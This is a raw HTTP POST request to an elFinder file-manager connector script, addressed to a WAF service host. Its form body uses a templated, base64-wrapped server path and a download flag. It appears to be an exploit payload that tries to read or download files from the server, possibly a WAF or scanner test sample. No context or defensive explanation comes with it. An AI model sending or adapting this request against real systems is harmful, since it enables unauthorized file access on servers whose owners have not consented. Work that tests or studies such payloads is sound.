POST //cwbase/web/themes/elfinder/php/connector.minimal.php HTTP/1.1
Host: waf.jiasule.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __jsluid_h=4878d749336b447428d5a36114e9bfac
If-None-Match: "62efd223-3"
If-Modified-Since: Sun, 07 Aug 2022 14:54:27 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 86

target=l1_%3C@base64%3E/var/www/html/elfinder/files/%3C@/base64%3E&downLoad=1
